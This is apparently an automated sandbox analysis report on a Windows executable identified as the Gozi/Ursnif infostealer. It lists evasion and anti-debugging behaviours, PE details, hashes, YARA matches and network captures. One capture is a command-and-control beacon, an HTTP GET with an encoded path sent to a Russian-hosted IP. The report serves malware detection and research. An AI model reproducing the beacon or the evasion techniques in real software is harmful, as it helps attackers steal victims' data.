      Source: sadf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\sadf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C7256 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
      Source: C:\Users\user\Desktop\sadf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
      Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@1/1
      Source: C:\Users\user\Desktop\sadf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\sadf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C82EB push ecx; ret
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008CB859 push 0000006Fh; retf
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C7F00 push ecx; ret
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,

      Hooking and other Techniques for Hiding and Protection

      barindex
      Source: Yara matchFile source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\sadf.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\sadf.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      barindex
      Source: C:\Users\user\Desktop\sadf.exeEvasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
      Source: C:\Users\user\Desktop\sadf.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
      Source: C:\Users\user\Desktop\sadf.exeAPI call chain: ExitProcess graph end node

      Anti Debugging

      barindex
      Source: C:\Users\user\Desktop\sadf.exeDebugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_0040134F LoadLibraryA,GetProcAddress,
      Source: C:\Users\user\Desktop\sadf.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C54EC cpuid
      Source: C:\Users\user\Desktop\sadf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,
      Source: C:\Users\user\Desktop\sadf.exeCode function: 0_2_008C54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 0.2.sadf.exe.8c0000.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.sadf.exe.e194a0.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Windows Management Instrumentation
      Path InterceptionPath Interception1
      Virtualization/Sandbox Evasion
      OS Credential Dumping1
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Encrypted Channel
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts12
      Native API
      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Obfuscated Files or Information
      LSASS Memory1
      Security Software Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Ingress Tool Transfer
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
      Software Packing
      Security Account Manager1
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDS1
      Process Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer12
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
      Account Discovery
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials1
      System Owner/User Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
      Remote System Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem124
      System Information Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      sadf.exe88%ReversingLabsWin32.Infostealer.Gozi
      sadf.exe100%AviraTR/Crypt.XPACK.Gen7
      sadf.exe100%Joe Sandbox ML
      No Antivirus matches
      SourceDetectionScannerLabelLinkDownload
      0.0.sadf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      0.2.sadf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.Gen7Download File
      0.2.sadf.exe.8c0000.1.unpack100%AviraHEUR/AGEN.1245293Download File
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://45.8.10%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      trackingg-protectioon.cdn1.mozilla.net
      unknown
      unknownfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        http://45.8.1sadf.exe, 00000000.00000002.511247920.00000000009FC000.00000004.00000010.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        low
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        45.8.158.104
        unknownRussian Federation
        49392ASBAXETNRUtrue
        Joe Sandbox Version:36.0.0 Rainbow Opal
        Analysis ID:717378
        Start date and time:2022-10-06 12:27:44 +02:00
        Joe Sandbox Product:CloudBasic
        Overall analysis duration:0h 4m 42s
        Hypervisor based Inspection enabled:false
        Report type:light
        Sample file name:sadf.exe
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed:13
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@1/1
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 46% (good quality ratio 44.1%)
        • Quality average: 82.4%
        • Quality standard deviation: 26.9%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: sadf.exe
        No simulations
        No context
        No context
        No context
        No context
        No context
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.519548477170318
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:sadf.exe
        File size:37888
        MD5:76ebba129360ad5093f0fe66910eb06d
        SHA1:a0297ed108f534539bda64c7c0df0caefc18ec09
        SHA256:f8388847ebddbc0c6db43ede0ee839fa304fc4786d4a7c8285eb746a5a2ee711
        SHA512:b752d9d3e9fab50b1f1a4b3cfe565dc5c0bd1a909abe0b88ae5ee99c241280dace99ee33a6cc5bf2447bbb11975fb6e45b835c380555fb31fa5b15f7d4948bdc
        SSDEEP:768:LQLm41fM01vA4yRzFiCRn7IYbo7gMaBMOF6c629ptoj:LL41fMSv1AnRnFLMaMOF6c6YK
        TLSH:C203E0137B642D3EF6C305393E12E20147990175873FE1EA07B3642D9922EDB55AF786
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y..+...x...x...x..lx...x...xQ..x...x...x..vx...x..kx...x..nx...xRich...x........PE..L.....%c............................/......
        Icon Hash:00828e8e8686b000
        Entrypoint:0x40182f
        Entrypoint Section:.text
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
        Time Stamp:0x632596C9 [Sat Sep 17 09:43:37 2022 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:0
        File Version Major:5
        File Version Minor:0
        Subsystem Version Major:5
        Subsystem Version Minor:0
        Import Hash:1640d668d1471f340cbe565fe63522f6
        Instruction
        push esi
        xor esi, esi
        push esi
        push 00400000h
        push esi
        call dword ptr [0040203Ch]
        mov dword ptr [00403160h], eax
        cmp eax, esi
        je 00007FBD28CB62A7h
        push esi
        call dword ptr [00402008h]
        mov dword ptr [00403170h], eax
        call dword ptr [00402044h]
        call 00007FBD28CB5EB9h
        push dword ptr [00403160h]
        mov esi, eax
        call dword ptr [00402040h]
        push esi
        call dword ptr [00402048h]
        pop esi
        push ebp
        mov ebp, esp
        sub esp, 0Ch
        push ebx
        push esi
        mov esi, eax
        mov eax, dword ptr [00403180h]
        mov ecx, dword ptr [esi+3Ch]
        mov ecx, dword ptr [ecx+esi+50h]
        lea edx, dword ptr [eax-69B24F45h]
        not edx
        lea ecx, dword ptr [ecx+eax-69B24F45h]
        push edi
        and ecx, edx
        lea edx, dword ptr [ebp-08h]
        push edx
        lea edx, dword ptr [ebp-04h]
        push edx
        add eax, 964DA0FCh
        push eax
        push ecx
        call 00007FBD28CB650Dh
        test eax, eax
        jne 00007FBD28CB62DCh
        mov edi, dword ptr [ebp-04h]
        push esi
        push edi
        call 00007FBD28CB65E3h
        mov ebx, eax
        test ebx, ebx
        jne 00007FBD28CB62B8h
        mov esi, dword ptr [edi+3Ch]
        add esi, edi
        push esi
        call 00007FBD28CB5D04h
        mov ebx, eax
        test ebx, ebx
        jne 00007FBD28CB62A7h
        push edi
        mov eax, esi
        call 00007FBD28CB67E4h
        mov ebx, eax
        test ebx, ebx
        jne 00007FBD28CB6299h
        mov esi, dword ptr [esi+28h]
        push eax
        push 00000001h
        add esi, edi
        push edi
        call esi
        test eax, eax
        jne 00007FBD28CB628Ah
        call dword ptr [0000202Ch]
        Programming Language:
        • [IMP] VS2008 SP1 build 30729
        • [LNK] VS2008 SP1 build 30729
        NameVirtual AddressVirtual Size Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IMPORT0x20e80x50.rdata
        IMAGE_DIRECTORY_ENTRY_RESOURCE0x50000x10.rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xd8.reloc
        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_IAT0x20000xa8.rdata
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x10000x1000False0.718017578125data6.515539058364033IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        .rdata0x20000x4c00x600False0.4635416666666667data4.488955985688776IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .data0x30000x1940x200False0.056640625data0.12227588125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .bss0x40000x2dc0x400False0.7607421875data6.3016514258390215IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc0x50000x100x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        .reloc0x60000x80000x7200False0.9710457785087719data7.859639070268769IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
        DLLImport
        ntdll.dll_snwprintf, memset, NtQuerySystemInformation, _aulldiv
        KERNEL32.dllGetModuleHandleA, GetLocaleInfoA, GetSystemDefaultUILanguage, HeapAlloc, HeapFree, WaitForSingleObject, Sleep, ExitThread, lstrlenW, GetLastError, VerLanguageNameA, GetExitCodeThread, CloseHandle, HeapCreate, HeapDestroy, GetCommandLineW, ExitProcess, SetLastError, TerminateThread, SleepEx, GetModuleFileNameW, CreateThread, OpenProcess, CreateEventA, GetLongPathNameW, GetVersion, GetCurrentProcessId, GetProcAddress, LoadLibraryA, VirtualProtect, MapViewOfFile, GetSystemTimeAsFileTime, CreateFileMappingW, QueueUserAPC
        ADVAPI32.dllConvertStringSecurityDescriptorToSecurityDescriptorA
        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
        192.168.2.345.8.158.10449704802033204 10/06/22-12:30:02.562975TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970480192.168.2.345.8.158.104
        TimestampSource PortDest PortSource IPDest IP
        Oct 6, 2022 12:30:02.467928886 CEST4970480192.168.2.345.8.158.104
        Oct 6, 2022 12:30:02.562129974 CEST804970445.8.158.104192.168.2.3
        Oct 6, 2022 12:30:02.562357903 CEST4970480192.168.2.345.8.158.104
        Oct 6, 2022 12:30:02.562974930 CEST4970480192.168.2.345.8.158.104
        Oct 6, 2022 12:30:02.657660007 CEST804970445.8.158.104192.168.2.3
        TimestampSource PortDest PortSource IPDest IP
        Oct 6, 2022 12:28:42.239211082 CEST5892153192.168.2.38.8.8.8
        Oct 6, 2022 12:28:42.260540962 CEST53589218.8.8.8192.168.2.3
        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
        Oct 6, 2022 12:28:42.239211082 CEST192.168.2.38.8.8.80x9aadStandard query (0)trackingg-protectioon.cdn1.mozilla.netA (IP address)IN (0x0001)false
        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
        Oct 6, 2022 12:28:42.260540962 CEST8.8.8.8192.168.2.30x9aadName error (3)trackingg-protectioon.cdn1.mozilla.netnonenoneA (IP address)IN (0x0001)false
        • 45.8.158.104
        Session IDSource IPSource PortDestination IPDestination PortProcess
        0192.168.2.34970445.8.158.10480C:\Users\user\Desktop\sadf.exe
        TimestampkBytes transferredDirectionData
        Oct 6, 2022 12:30:02.562974930 CEST118OUTGET /uploaded/OefU6cYu_/2Bh5eSBuW1HoOJMcO7vA/d7SIWeoRQwnGkilzDpQ/6dU8XqIZtXmxeiGmmCE64H/f1Nt6sF7IrG2P/R1VRcVzY/_2BT38Jx_2Fbr7v8to_2FLq/VG0YsHE8mG/n_2F2PKN3TdKATV_2/FTdVW4ur9Omp/jrWMtuTkF90/3KGyudEpayTHCC/YXqBDl4ORyiaSJOw9sN_2/Fdabc1TmxPXNvinn/JCaxgYaDxedKHZk/u146Q0qWggdX24am_2/BCgVA4PEZ/TXr3WTRz0EG0cXZKBsrD/1oC2dl2fycp/FBzL9h.pct HTTP/1.1
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
        Host: 45.8.158.104
        Connection: Keep-Alive
        Cache-Control: no-cache


        No statistics
        Target ID:0
        Start time:12:28:36
        Start date:06/10/2022
        Path:C:\Users\user\Desktop\sadf.exe
        Wow64 process (32bit):true
        Commandline:C:\Users\user\Desktop\sadf.exe
        Imagebase:0x400000
        File size:37888 bytes
        MD5 hash:76EBBA129360AD5093F0FE66910EB06D
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384425288.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384568130.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384610353.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.511485713.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384466253.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384373909.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.511376097.0000000000E19000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384538617.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384591559.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.384627029.0000000001308000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
        Reputation:low

        No disassembly